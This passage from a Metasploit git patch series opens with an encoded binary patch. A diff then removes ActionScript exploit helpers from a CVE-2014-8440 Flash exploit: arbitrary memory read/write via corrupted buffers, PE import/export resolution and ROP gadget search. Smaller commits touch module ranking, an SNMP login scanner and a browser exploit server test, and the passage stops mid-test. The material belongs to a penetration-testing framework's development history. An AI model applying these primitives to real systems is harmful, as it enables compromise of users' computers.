zf413(Sb*XsJ8-c$yo{i>)kf;a1_7SDoqa%r)B5#Y92%W2de?PGxzTMjSy37!64q81
z6k+!-Rgbqfx-4~)oOSZOZ9^#yu&I5jJhUSzl0{6HqgfNP$jdLmj|}@u@Xcq(Df)H@
zY1Y$(-gsO>7C%*7j<g(WFo;Rl^~{7gfBv_!)xs~EoG&GD?%0<s0Heh`)XE`pNFn=(
z=UTth1x1Z?yR~z}O)#M(NUmEs#&e{K;T3#GU`gsE2N9_Q?#UsBe1=)P$Ek)CNnbev
z!hD%PRdkSjcW(ev$9(gDNRQbYIDj<}$`dv*uEQlig^ciU`T~p}L%`F(+R$1ye+Ckq
z-Ef#4Q8MGKJEk{Kln+Y6-3o4XicPX(u(=kcc5;liMetTk7k?@s1}%8?!KA@XS)s@8
z%hU4dVzzV6VLvcOV*$tUbg9o9cBLq%AEj6Q97lF7p3&0+uFGQ-+&}oL-OGjt=r|;z
zTiv6N^HPso%@IygRd*lfhy8cke{^62Y&Dy%&A1b4WamzNkZLumCJtBg*>F=+Ioz!F
zvX>=cYQfwIPlc~{E`noDEKrem`X{+<3)MhoG^S;}3-4n_ztI5#<%Zgpp|%(p$m~c9
zty*5KDY@U7e+FVf5WD`{Nz*p#ZX|-zD#R{wW}}3+L!2c(8payRhw5LGfAWOVyXv(y
z?*snUjmwf)>v}AgPBa7VWgnWO6#}jaT;>-bQ&V^dCp1OfD_u_->rm0hNUoS*j9dd}
zKNPktSv(5H56a!YN7#2MZ>SjXbWx<Tskg!Q?~O0O*O5R!@6uQdIB<KogW4OeU?8_^
zkPO11o3?Lm6>0r`oC&RKf8qSv8%XG<nM3tF*I5<(;<+j30*i*m{WmL$+`nvT=5Zjg
z2bgJY;S_xH@#O%wz@OOPqqcb<O1kU@DjoYTJ3C```|H9LgbY=<^rl%se3TH!y_hex
zW2R#gp3^!$9n$IM8ck-VhQl`@{1G>7)mq++q^HhTgi%zwWVuzSf6_8yOombWWIMR=
zcuFJ657LL{<i&pfBk~$4GVCjN6Y=Pii!(o{ykx*D+-#c$*AqKoQAWV@Z=creCnQ6S
z;{B&`*629a-cCozX2<kIh%!0rZQzMt1g+VFjX?EjhLxoz0KW~~_Xn}dI|-^{=HS=J
zRnlIoJe9&956to$e*!9SV)$wTW928CpJ9+p0+(LBJVGJ3lmnr1qIis`v|x{vp==N+
zcmacZ&juT`{I$utqa~JS`jsRt5*+*#wo}5d2~`8KuQaMF)!S|@#qkAox;;#JPR5Mh
z4r0R7fU7KPG}XNlDH+Pk@r{OQO2K+k#QZEtocM%^Fw+6Qe*%Z;`G-}7XtK_Qr2yg)
z351q=9*Qjeqrmni^x|~euX}~xu0|qpHhN4#Eo+nch)?l++#zi-<$(|k-J1lFHYP*S
z_hnp!g4Ru{!J}97Z0j4pA7R-|eKPdZE+xVeSV_BaQ9{Bp9e({c?J*~6_Lp%hwUONY
zL+mC(y=oT*f5oXH$u5($_rC5LjuTH|7)m0Vim=-x7-yxX4#g<t8_B~O97XAT@+M(e
z4;1tAL+mo&iXokNMi6Mkzj(5|;Ip>`We+;>{Ds9bSkNJcizWGQ0Fu1E%?v=#!4k9j
z<R_}<X*s);#E7M;Q(b7En%481v-}JZooG|iTvY~|e-Ch54dX1(-%2~atOxPX%+2Vj
zjMFo|T22S(W0&iG9z!a%EA*P~))xvE1cXVHbDILO&JyP`X6tc~JiiLKR;?V#H70@4
zW5g3MmFWy}%|;-R0zjcuHz-0^F)avDNuF9|LPg%QF`7y*-QI)n_Yy-{_*tR!hHTc}
z&Xn(8e^L(q=`-nxE<)uusot-n|LX^(@`9fKC#3;SH?G-)&Ee604v5>Fra4t)pMQP5
zJ`>j`znnTsD*0B@UF^P;#X?jzG<JInPql({0O=RRl4t|T2;<QnKo%a0i$|1d<~--C
z)&nekc$ux4NmDw`neQPe`l4j&Gxb;cf+76pf0}e7f6Hp&*$2c6Ls+_inKWaeY<0a<
z=ux{F;x)IygKY$jdF3|WX{<xKn4bhh$gqcS-yS@62}asrCrCLK6X|7Ww69~yU=$OK
zC_;iJX=TKWi9dy5YioiP)gC~!q|)xsjMfKs0Fnm+Af=`87zbTSf^JL?LhK;}emu>|
zf3htNU>DxTS7#*lTH|xB=M3Q9O~=X~^IbhTxycKxQEnqLq}!r<$$6Qk6poq=_+7~_
zw+K1};W`ddQF(zG^TGN+ImT1Zuy&7V^U=Elhq~E0yE^QuYm@hQTe5#$^k7o$)=z7L
zL>WG^*DN<K1QV_Hy6@`)jBDp`h?aLQe@Vt3d}V$uv_e#9IV%5!BexWVp<+KptZ>T`
z+z-rOXG=3N-sz$)^o`grl@RIjt>u6&Ybdoku|Xoozzrud>Du_m=rSYHapmoQp!fW0
z9>uw+lNHdg{xIq)u1Us|?rLqX%5$7scvJA7JH<bs0AOH_shjR@6=RdYlH2P%f7yEy
zJxCf&NhCvtYYU(#{#g0os1Eg=j9~ng66+#aZ35Q5IfQTR$kur!ckOi6h%N^^YB1Vl
zli7zWAljr$TkcF{Q<@|4N{DWi#9-Y8rG2na@@;AiQ<dCJ0j!cKGEJ-0hU4X>-t=E9
z{euedx|2Vf5wX>kPN9K&7zG(2e{0nl^`up8#4;Teb(Q~5AQ;dxqUAORx2W=F5XC|g
zE;5b>UygBCfU(%IJ8b(JWhi1V8i-+c5wii2=5NWz5U^~R%-7>Mi^1>C9LY>lL7xPX
zp}{5XN`Bg$n6M#OLChkVqAKB#z%)zyE|mMNRh@`!=(G#!+&B_y;Gl<Jf3zi6S7Zv$
zpitHZ3fBl@L_QG?vaB8$deH1bHrbxT^`X<YgRvE08TGi?=5FDxL~*<I%Du{^_$5_S
zAZfP`p9p|eo=4RWAGSh7j65cZDMUqxp4PtukelyU1klh^cgut>U{><7PwdRXIJm6j
zdD2X9A$%4(t8PN3+D2iNe<J4eH38T$+16J^2YJPK6)bmn1-q3M5PJtoGfaEq&A4TR
zxL>RgM6&!@)#&V~4_m@Eu8dag%J_ey0ce=e5eM_|@s4P=p@krtoABf3IHOR{duZ?3
z5Q^7L<Aw|G7ZbXsel(cMG9UCdZZ%pqrig+>X;ZSs&yN0M<yrn>e^P=TD-k1tb_dL!
zlQ|?T>h2zbGu^s*>XsW_bC@A4Tle^Psvdn{+pIj^DQM}4%o&*&YAnFiFPiA3i0%L8
zJq$LS4ex*$aZ{=<EG1J@7jT*K5h`6^@$@)%O?cH9^vf<PdWtDaV=(j>^+Ac75A|!y
zR*k~)o$b>Itgq==f8nmKGgzbt5Ov{DDaCwZWLgK3CDzuVu)TLi)YS`L?b@|81{G9G
z@hm$e0twpTqt@xuT;N0K+xB`!nQqP<tWYSuF@-ZAdg%Jf<0o$g(I?`F7%pC<T6X9P
z|42SFDtbRyHIKb8i6nGR8qN~rCO8G%K=@OHkRadU^?+Psf8v^;;PKE9+949R*hO3(
z#iV5|0pAsoV%=8kx+UxCb9M9fMM?MbRLC#^)UvoCrcO9Np2qrj<z<3xabfy5f_F9Y
zj9sQqnIMx?2YG&a7o<O`<e;&#t|G9`=j}7wI)r+JkJL|E#k6Q@^0uD0d$3<F6(^ML
z&17d>St2pRf8*;B=rjjwn0s5olF_#vq=Wz<e?+#hP*FK*9S%<0OttlAxUHJ(ej<|?
z*xOSq_c@1eFkrKuzWQ7!?L2#Zj;>X|Ow(!)`0P0uJ@D<)Rxk_T=51ZYu??k-nSC*x
zOU0}BK`jnq<?bens<Z~3G|a~nO<G5CPw|%aV{4?Fe?Gr{0iqOL>n%pel)}C=1CX*^
zSLAbhSY1y=z_4S?wP@>gvi^<Orxe>eQzC|WwI4kB4Hi1?=UXv?;Gg~0KJDS;z6mW6
z5Ys?u1~M2wV-!-7Y6?Ld?d-{>J3^_iJlfvb{*b#=bVSnyX2J351v;yO-CdOavAtWi
z${I1B2fT{SjDMe1L2J6723yls`G4MbnW5eGi#W7<i#5M}Lf6^qMf5p+OV=IZI?mzc
z@R6d!^Q4|GAdKCG+_Jnm&6nq~6(Fq86`Su0O!4Q-FMpSNjo~cJS4_N19@tt_;<yy)
z;t?cATW14~BG2o+g%BA_neZ+2N!l(5s4~D)=^P!QK!3q~mo=)8`{57s-5_{lf>#gF
z3en72i>J;>o@n%Pk8C%}=b}D-g^C=jsSzu5-wN%+TGafzJyn!P**!wTOxM{qR%(`C
z@H9w7%@s74BywE{QQ_Cv%{}9_*Lu=<vV(WT;ag0)bmVvjNLQ<@3-9>!47nhV5|^Sp
zNkecb3x86CJK@&bC4f2{|7Clsfrpo4px0aR?42*;{mp#amqAMZzEMbs6PY8`>?%R-
zJ|iQj#20AMqdK;qo({ucMXBrOH&lpm!mLcbnktsT5v7M)?168xCw#w833wrhRyfM3
z-^Zw02zWFWtOLdCj4Ef9y1A_3fPhPP%JkV0>wog>;t#2d2r5WlyvB0&4>?6`Q}v-t
zasu67z}CbOwX;nq)4K<Xo!Pz+Vg2+)<AB5kdP;w&k}e6b=DoBEQr~tY8oV!<Cd2Ab
z9Twc-m9P4G`-vWJ5~W%|CHgPHrez&uDuItg=s$UqH0;Nj5EcqpGNnUB-HZB8;(l`2
z_<s-GJ_D~B$J;E~+DM0r=1QObHd!$TGAw=rJ;P45wKgUs8?Sg<ZYFc~7~!Z$zs<Hh
zC#@O6-nBMW(=%KtAZpdyDtkbu+BT3>j|72h=OwHZ>WUtf6=^T8@;8=GTM9<Q`p2bA
zWo7o61N6%&)T|~TAu=D8h9@3w>;TL9`hTxsV`e(ZlRu)24XgQtg=iH9fLh)ztjN4E
zO(&SlRGqZ7GeeH&h~@br*OTmHg@Nr_%nj@#=sTJ5MwA7bH)MsiVm`v<A|w0*I7}>T
zG)gS|^}FUUf`GqGDKP<xZ(reuy8tml4?d^Ou%_V>DPQCJ@KHxx?3q`KM!v*0+<z!J
z{gqo1GyV{SooU2%ivNGLvahsP_%!<z%r@QR?K)E)KX*k5+cs~6Su$)iI6WFA0w!zm
zE=0;%QM1CZajigbP<br_U9?7gm5Jd2@W85R9esd^&y)Q?McvqX88@+fq^tEa3`>BF
zuaeZDzbLMFcEG&X^YVqPbk18Ve1G<dV1dc}JFmpZPU%toD5pwD!kY{dzxfV(?<>xb
zby8GM_Nd$+2`v|HZIgC?3T58U9D0Ja0aJwkz&uviD7^P)ZmO316&!e$N_RBTOu>Zn
zG=7tliJ$pT$6D|wxq1hs#1c6%I0qq<xrB#WGs%{o5Zpr)Z+x_6zj3n6z<-227n26p
zn0PB<feX9GJ*3#*E(q+WkwM1pxqW;n5OY-^KUrg57IDO`v}IPVP`dRz<db%!NQax8
z;D%4aNBX#wT2x}2`-kLQYO`AGipoWTbmD)nlOUx>aVDeagCB29=CUPB69R)QW`TKp
z(bIBb)D=tNdaR8|HhpcZDSwb=^=Jxwn<QFr*TxKnEz_JQu{%-TyZE5*sJ!qQP?Ozx
znSj~UZYHqtBC-7N23BhOI*W>#fAztA!rtUaOqzPf7Wa*~94+s5Dq6NRs3g<r8<$Zv
z(1RlX0BP`Jdd`a|i}JBp9PY{`5YANM)!Tz2D&P}s*9W;d;|8PU+JED|*j*WQj>~K7
z!he7z3TD3-&wM-piQ6{xWIK2szy-LM_<CMW;R?Mn#$7OmL#!`ry=cN|hi|ibY>R_!
zY!T4QxdLgr^F;K3d#fudiiM4|te9oq{NBZSWX12vVGZfTn$7A_TVqvze0!tFQ|!m_
z=m9E+)FPBjsAJ6Mi+_+m*Dx;h_DRm=;5byJIZ5!CUx~}>g0V?XlB~q*{j{o!($c;W
zC$|3)c|YT0ZZl|v!AGL9I9>vKe~_CFxmrab7?6vj#PA%0+nJNx*c(p%#2T+uGI3G8
zPo^^oh3LU(E*`9j9N?1(COG!L`1^7I{S9ZlU-X*hHh#>zy??2#J+|Lq4Omd)*P6&U
zJ<M(seQ1fVRH`o|dtH>{4~7v=>P*Ej)+N`+X_#=8vK2He^OWHi0}*nQ`7XuR#P9Ly
z=JLrxOXkRUWjYFd#Q`}jc@IYxow=nd&@g&<B+cvN$L2$yc0nvH&zG*yFl3+ipB1F@
zahXM^(u9RX9)GqJ9#)zBc<dJ=5mba&u!jX#+gZo7MbLLz(z{YSw;!=;^gR{3PAL$h
zvJH7TyMY+A)Lka>P$W1pKiX1|9|uzCC^?X%(2P0BZpSl+XGzteCk8}&>1~<-y$g4Q
zaj_bU>j)ciDN|o=6WjIV8y}u3l0wKU#}5zh2Ao8gf`2>;3Pn&tx?uz`ev1~nPwaNK
zk|cVQV(O6#2h<oT7`xo(9l<ewx4)^zSNpx(Z*QbEgJN{bmezbm+F1M~E*{g>RQ$>h
zA|L`~mZ(?GFyjehxf8CTfrBXuWRefAHv6RKJ)hWOPZzo9bB<go&NEA2?%(aEw`@<G
zsM8@|!+*#{AHO_1BfoH-5)!G?+I>eEtd4kx&xsSc&$9y;zo0aGHX&%h2ceFyl-{MJ
zQ2sn%7l?Vv9R^<p{9>6u0S1>$CDA%ui*v)>b_nTTGQ(VWu(ca*-WcseNXe7HipLu`
zcl-uA5T%9{;V9&UqqaatEx1xjJ%AgMA#A;Sc7Ng1yY&Ut7QFu5#0(?V-3_$<S+X;Q
z*evr^FObEp_RLD{8t7p7J9I~)aiq=8>u5Qi>AA|Dv=k)03cVKWJTk=ecR%GS9o@jg
zcNAT9=-b>FVSg6=BporVY^Y(C=PwUxZ(fm@!Mid~ofz$Rrc-;C5JsL07s()oX+axL
zX@6T4!51ATPcY+wOJsWF5d`V5Gq^!Y<1*O^j2}L8A9p%9G$L8pfJ{f)Ma%<`c2R<D
zi5nDyzU5R&PFm6{Ns<<XqCYhbwjZhW6>vqZ-a+13fyay9N<d92t{I+GJs}3Z=%7*c
zLgmZnJ^a}pCmC`@3=^fQ(-IN%-)hYS#DCU5U)z1S&QtB8C0u`lh%SA|sM;JL92o}I
z52M(^>b^V^MNLMDpI{-~ps$xp7%mYzB|iFm2n63w80Lm@T6J)-HGArlh<42^Z$+Je
zR6>;~UM5b0M@yf3^{!NN!7JgH9Peo{#690F90VX|R=?Yk;sYFkHRZ&@7{r4SN`K$8
z`YRK<AE*IrYz3DSYAR_yio)p6q!-_5zH#9>mx@o(^0uX7#TgU|;;utCSViMp11k_1
z`KiTi<b4tre6`NTk}!c#$$i*jZa_)V0=1a{S3AT{2=q03PgS35umg8zm?`*xl5zWj
zwQ7+<wzWTsP>)rCnMUn<raS+ozkktDkH#X&B#}EOrA2;zV6JCU%Gb_4%7M=`CDCu+
z>Djc-?ADE1QymB&9~~dxY|Z^QO79J6f5MKcH{+WVvW;)s?IHIIP3!Bw6NIKuzxSkg
zfFr}V3z(BLZ0R~uTg9{@N^SA;G{=)`tMnqQ4vHk`a6X3my5>IF^U|<>&VM=|mg0G*
z#t_$-O3*9C%Ul~7`?mQ;vKzLKFPqm%w~;pW|FgK3*Qecl7GtKQeky{#iM+oGL(-{d
z#vL%TTAX;NYS>7y$?tLPAnUCubTBrZLnzJ7S?7F-oRZ?y;sE)0V=aN^M1)}}>@<z6
zN)~k22S=JQ3EsC@E9}tvP=E8sNI#0g4(iFKM#5W?mH(;hB`y>K@0*lsAysRlgA#O!
zuk*?t^GHOG06WG38|9rC$C(%<4r~WO-#ubTe34oh-r(=9W4rT;qA>yTfdRx1!BIb#
z+#z6A%5kCW&XfLLe6f$or2#9Tj;pSVZK|Hg`plc#yHob`XmeDs4u2zk*i)FqrC%HY
zda~<byoS8fmpt+^wX&IKy^3)#d$Ky94I=7SL`8-KKsa4OPYMVp&Q&qbI&fnNV>|>a
zausS~WbUm`gv8AC9C{>34=iz8BuavG-x5SI+k0j+W`O2GS5A%QlanJa?p@6<$r+^C
z?W(~DUow8Yt&pgpNPlBf;DiIKlgG7-oyGBN$KPQR6F}iO0%UKW9R~B@3<A!DjKrs-
z%<T!7q(S2SkW5k9L7?&sy<)3R;pUv>6g1z=rPz6bZh>TX29zpsPA)`CU(Te&sfyea
zVZ`&}G&-dzRChfi1(J0nUN2CH?Bb`dRX1@=XZw2XOV~@TqkjqoIf6dvGqDi=H9%9~
zKB=-qg9&HdxzS&Tyz~pxq~=dAy}o7i7qp`%QYQu(*Sopc>CZv1qG&Ll%Oqxh8CE#F
z^)!`ZXC2LWGsh1QrkZoRw#PlC8vkbJ9Lekxuy_ukb?#$i_&gPF)ehGG$#|}4kw^k@
zkWGOGmrKxkf`3XRGAqnS88Q^j)f!Z?XJ*#2^-~cjljTp^C-(R+)vcIRAzp*Z{sJEP
zfTa<G_rC7l%ipswAPO(jzOZ(boowIM5(gw)285MCAm>{izz%Y-j@ojPh)Nh4wMSaW
z*G1)AhfZxWb5|}_FJ~R1@cho}E*dhxE0r^dHs>OdhJT~ex@TzZ>|)NXcOoa57NLnc
zuput~N3((9$2g6hE<QJ0S^p7>_c&UoNdNb~O_1eYQ3$y^BJz-2F}P^2WpmTM+iD1J
zsFM;G6;vneZU43Xf0>F7B~Tq2$$%>ThkUK~`V!(paV2flY^2CnVGD5We(9$(0^BzU
zBI#e8Wq-mW9u*;rqlLYvpu?A`L|T}9!+5sIKc~qoVfM(4-nL8BiJ?R8gr^~)2cvNA
z_DoRw9xVW%REki?=X8cild_jG#JX&-P?WbYJ!TQHl>J3unUd_(@$tCF$E;Ij)gUjW
zO0e^p5hSnjLJu{g1J4!h{%Xq!yhwK-avQcnmw%AB<L2?u-#KS8hm~b#orFRK%Q@Nt
z8`;Id<FP>KfdH!XBfTsQF(LdCJ+BAj2SIS^FE`!>S$k;F2M0Qogs)qX$^!IP@j4c!
z&*gnc5wIC6iEylV!jIcOW5(7F4wsuHbi6>4(kqtTgz1CkJXb;;aI08OE)N%0*1s>w
z$bZwql{fWsiO|ajIym995x+KbsL4lM@Wd9myWIr0I0v}d)X?jkFrY)|p>7bm=bv;Q
z+m9u!PHbYWC>(e%>NyC=AVX<+u1^9i;VQ@>+kEQ?1iB9eljh*<Wc+skIu;SdqIoyE
zMFOD+i>Cv^FyKDfxkxPgb*I(y0RrXtEPvJ;=Y^<Ei_xGAaCxxg&rfnDzjMo-E+L@9
zvAhVeIT0BjP8%p18dG;^v50fR@`z^$%^)v;OK2byAKa^4ZdHB_OBh$5!yoZjmS=^z
z)wM|wJm`E(EC@bmY1YQp=Ovov6O3?a8NSscc|e%ZT?~=T|7-ybV6)Q8p{FZ=4S)5j
zFM+ncP(bHxo>t2rN9bcvr3>a7>KWNO8~K-`k>2;{^N_`0Rg_L;;A4R*<qEEf$lEg^
zAC(39kK&C|d3_hRBtnfo6IlNmJVpyW>Y&S&i{31NnHbz&vgDd*lzd1=o-7lFmQ?T?
z5}QJoeRbs%!%@CHCo|3TD$QL)aDP^+@Q7NiGsw`BsB4pv0Fm6TetMzn$P4jR@(N$N
zi@yU}=-|=VNk9Lj=2=hZmieElE)Tg)d~?A{bWK`f-}xmm1(W5=!1?YwbI6>9$$=rj
zaom@d4TFe|^*tJI!b=aKfVUL;0ak%JfF8t6eJD?EnF<O}!Me}LVyE|xV1J1&CX-l|
z4{m2>Lq-&+9mm*3*3S7Kw&2W;qMdh0nyC6(-J17e$vR<T4sCr})CfA92YC8l^lszz
zZ_nCaW)tXXi_%5kf-oSRs3xhvO-SyqmG0F6cc<M)!_;DQLWx5SXt4AdIAg{!9^PUx
zLKd_;1oKLl4`Zh=@YA$HoqrXdAK~)HmLVliP&H|*toKh_MQ=+JG%#+s!V{?f*p}7M
z8=471W>736icW^zeR|%7v`Ahl#3~h1zYM)etScd2l@gq>bLd6ScW?;h3{(C;Db2e@
zP$7!rN#MZkC)*A?i9CnTP9N$Nps8v3%zo$SdRj*M1De2uYo9zva(|9udQL7A*QIE;
zivb>uFPtWj$%EngUw=7Xpdk563F&9=z|b94WL5jWlh8?0{~KmG2%wzv=*I@pi0ZPf
zY7xHSMTLf+JX|*Ocn#(1u%Y+1;Pl?Sb<59+ZDYWsi|Njyy;T|b%qNm6|NJ#4!W@%O
zg?zeG^dQAeX`YS`;(y!PYF5YDu!WelvRt%NQ#UWqmhSyz>E6xFai9R)+GFqvZ>X_R
zEmMf5ktfZr6q~d;;pxFaIrpI$wxs@xa5@`LgEqww`+4zzXEFG&*NHE-8>4ZU4SLC2
z8Gqvatd3<`rZ{XInZvItcXFV%YpXKsOla8Fy+43+j^qPSI)6b_3|ZPde<^ivFRl3z
z>x|rYED1Fmmr&)^FS2Rx_BxDXuk8{d2&fJ1&^Y)6un3oc6hpHg)TBCITY=Z;y$;}7
zDC#vpASxHP0M+@PcW}#g&8Zm}I}ZwUZ@K~-loff?N^}9AGPj-g`_nZ6PDr$bd62yI
zsOw1VcKukhdw;n*DUr>A2RzPia*5|;q@HHY&{UF*)B=$1^gG%s@ekjov5;Ia;=vv&
z1D#t}A6qkJmDlZoDPAoqrR_EbJY(-*O?AXGU#&XGu{`NFg3L!JU@S&N9Ns3{xOl?H
zOhbutIQ{Lag=H{CyDvgS%OXK6I{#ICcO;HvOEa00pd}5;2HmrR2l_3107lZV=HLrH
W<4N#Am56si%aWGX9smDR9?SrnU@0*G

diff --git a/external/source/exploits/CVE-2014-8440/Exploit.as b/external/source/exploits/CVE-2014-8440/Exploit.as
index da8d636a59..c6e0928bd9 100755
--- a/external/source/exploits/CVE-2014-8440/Exploit.as
+++ b/external/source/exploits/CVE-2014-8440/Exploit.as
@@ -277,144 +277,5 @@ package
 			}
 			return 0xffffffff
 		}
-		
-		// Use the corrupted shared_ba to disclose its own address
-		private function search_ba_address():uint {
-			var address:uint = 0
-			this.shared_ba.position = 0x14
-			address = shared_ba.readUnsignedInt()
-			if (address == 0) {
-				address = 0xffffffff
-				this.shared_ba.position = 8
-				var next:uint = shared_ba.readUnsignedInt()
-				var prior:uint = shared_ba.readUnsignedInt()
-				if (next - prior == 0x8000) {
-					address = prior + 0x4000
-				}
-			} else {
-				address = address - 0x30
-			}
-
-			return address
-		}
-		
-		// Use the corrupted uint vector to search an vector with
-		// interesting objects for info leaking
-		private function search_object_vector():uint {
-			var i:uint = 0;
-			while (i < 0x4000){
-				if (this.uv[i] == 114 && this.uv[i + 2] != 0xfeedbabe) {
-					return i + 1;
-				}
-				i++
-			}
-			return 0xffffffff
-		}
-		
-		// Methods to use the corrupted uint vector
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{
-			var pos:uint = 0
-
-			if (addr > this.uv[0]) {
-				pos = ((addr - this.uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
-			}
-
-			this.uv[pos] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			var pos:uint = 0
-
-			if (addr > this.uv[0]) {
-				pos = ((addr - this.uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
-			}
-
-			return this.uv[pos]
-		}
-		
-		// Methods to use the corrupted byte array for arbitrary reading/writing
-
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) ba.position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
-				if (zero) ba.writeByte(0)
-			} else ba.writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			ba.position = addr
-			switch(type) {
-				case "dword":
-					return ba.readUnsignedInt()
-				case "word":
-					return ba.readUnsignedShort()
-				case "byte":
-					return ba.readUnsignedByte()
-			}
-			return 0
-		}
-
-		// Methods to search the memory with the corrupted byte array
-
-		private function base(addr:uint):uint
-		{
-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) 
-			var i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				ba.position = addr + entry
-				var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
-				if (dll_name == name.toUpperCase()) {
-					break;
-				}
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				ba.position = addr + entry
-				if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}		
 	}
 }
diff --git a/external/source/exploits/CVE-2014-8440/Logger.as b/external/source/exploits/CVE-2014-8440/Logger.as
index 61ec768c25..16c0447973 100755
--- a/external/source/exploits/CVE-2014-8440/Logger.as
+++ b/external/source/exploits/CVE-2014-8440/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
  
         public static function alert(msg:String):void
         {
diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
index 1847fc43ab..b4fa07267a 100644
--- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
+++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 

From 7c91aee7a80f5d9297f9778e866c32a88c30aa84 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 9 Jun 2015 20:33:46 -0500
Subject: [PATCH 0372/1013] Dont use a "connected" to keep compat with BSD

---
 lib/metasploit/framework/login_scanner/snmp.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/lib/metasploit/framework/login_scanner/snmp.rb b/lib/metasploit/framework/login_scanner/snmp.rb
index afeb5267de..9d17b75e0b 100644
--- a/lib/metasploit/framework/login_scanner/snmp.rb
+++ b/lib/metasploit/framework/login_scanner/snmp.rb
@@ -320,8 +320,6 @@ module Metasploit
         def configure_socket
           shutdown_socket if self.sock
           self.sock = ::Rex::Socket::Udp.create(
-            'PeerHost' => self.host,
-            'PeerPort' => self.port,
             'Context'  =>
               { 'Msf' => framework, 'MsfExploit' => framework_module }
             )

From ed69e5f90273769c2b6bc0a614887085425cbbc5 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 9 Jun 2015 23:45:41 -0500
Subject: [PATCH 0373/1013] Redo BES rspec

---
 .../remote/browser_exploit_server_spec.rb     | 437 +++++++++---------
 1 file changed, 209 insertions(+), 228 deletions(-)

diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
index 7c36728eed..74a3620147 100644
--- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
@@ -1,53 +1,84 @@
-require 'spec_helper'
+#require 'spec_helper'
 require 'msf/core'
 
 describe Msf::Exploit::Remote::BrowserExploitServer do
 
+  # When unpacked, this gives us:
+  # {
+  #  "BAP.1433806920.Client.blLGFIlwYrxfvcY" =>
+  #    {
+  #      "source"      => "script",
+  #      "os_name"     => "Windows 8.1",
+  #      "os_vendor"   => "undefined",
+  #      "os_device"   => "undefined",
+  #      "ua_name"     => "Firefox",
+  #      "ua_ver"      => "35.0",
+  #      "arch"        => "x86",
+  #      "java"        => "1.7",
+  #      "silverlight" => "false",
+  #      "flash"       => "14.0",
+  #      "vuln_test"   => "true",
+  #      "proxy"       => false,
+  #      "language"    => "en-US,en;q=0.5",
+  #      "tried"       => true,
+  #      "activex"     => [{"clsid"=>"{D27CDB6E-AE6D-11cf-96B8-444553540000}", "method"=>"LoadMovie"}]
+  # }}
+  let(:first_packed_profile) do
+    "\x81\xD9%BAP.1433806920.Client.blLGFIlwYrxfvcY\x8F\xA6source\xA6script\xA7os_name\xABWindows 8.1\xA9os_vendor\xA9undefined\xA9os_device\xA9undefined\xA7ua_name\xA7Firefox\xA6ua_ver\xA435.0\xA4arch\xA3x86\xA4java\xA31.7\xABsilverlight\xA5false\xA5flash\xA414.0\xA9vuln_test\xA4true\xA5proxy\xC2\xA8language\xC4\x0Een-US,en;q=0.5\xA5tried\xC3\xA7activex\x91\x82\xA5clsid\xD9&{D27CDB6E-AE6D-11cf-96B8-444553540000}\xA6method\xA9LoadMovie"
+  end
+
+  let(:default_note_type_prefix) do
+    MessagePack.unpack(first_packed_profile).keys.first.split('.')[0,3] * "."
+  end
+
+  let(:first_profile_tag) do
+    MessagePack.unpack(first_packed_profile).keys.first.split('.')[3]
+  end
+
+  let(:first_profile_info) do
+    MessagePack.unpack(first_packed_profile).values.first
+  end
+
+  let(:cli) do
+    sock = Rex::Socket::Tcp
+    allow(sock).to receive(:peerhost).and_return('0.0.0.0')
+    allow(sock).to receive(:peerport).and_return(4444)
+    sock
+  end
+
+  def create_fake_note(tag, data)
